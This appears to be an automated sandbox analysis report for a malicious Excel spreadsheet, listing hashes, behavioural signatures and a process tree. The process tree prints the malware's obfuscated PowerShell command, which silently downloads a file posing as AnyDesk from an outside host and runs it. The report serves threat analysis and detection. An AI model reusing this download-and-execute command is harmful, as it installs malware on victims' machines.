Analysis
-
max time kernel
16s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
04/09/2024, 21:22
General
-
Target
c0271c724570057759359da49e5934de2c1aa04dfacca0b95403241f6f1465cc.xls
-
Size
77KB
-
MD5
0779070c794fbc9d084ed1f066e56fe0
-
SHA1
7af4b1d2509ae0ee2646ab9198ad4b9d6e3fd0a8
-
SHA256
c0271c724570057759359da49e5934de2c1aa04dfacca0b95403241f6f1465cc
-
SHA512
d3bfe3cc1072c6ff2d43d2f058bdf3787b80a5324f8bf5c8708c0a70946a4c1150f4974821ee9339bd0f3fdedaa30094c43ff0a907b722f9e5f212dbc0cbf111
-
SSDEEP
1536:Ck3hOdsylKlgxopeiBNhZFGzE+cL2kdAVezI0ScDNzmVQyrnHRBoESK4nceC7r9p:Ck3hOdsylKlgxopeiBNhZFGzE+cL2kdX
Malware Config
Extracted
http://thepunchlineexpose.com/Manager/AnyDesk.exe
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Suspicious use of WriteProcessMemory 8 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\c0271c724570057759359da49e5934de2c1aa04dfacca0b95403241f6f1465cc.xls1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Public\Documents\institutionsport.cmd" "2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -w hi sleep -Se 31;Start-BitsTransfer -Source htt`p://thepunchlineexpose.com/Manager/AnyDesk.e`xe -Destination C:\Users\Public\Documents\weekshe.e`xe;C:\Users\Public\Documents\weekshe.e`xe3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
206B
MD5e623d1a58b6060f53e373dc8d9850c87
SHA15d7ca4d6ffb2c4c96615b72acbf54060765c861d
SHA25699f121fdaf92f6bfdb6af9bf6813fd10ce95b848378b964739b1ae7e667e34e9
SHA512f8ae81455e3de663d89a255b46b98d3ff01c8741d73be3413163a2743ae2e00e47ec094f253f15cd8d0fa7aba04fbc31c52c7b23350435277a0507cbaa86f74b
-
Filesize
44KB
-
Filesize
64KB
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
1024KB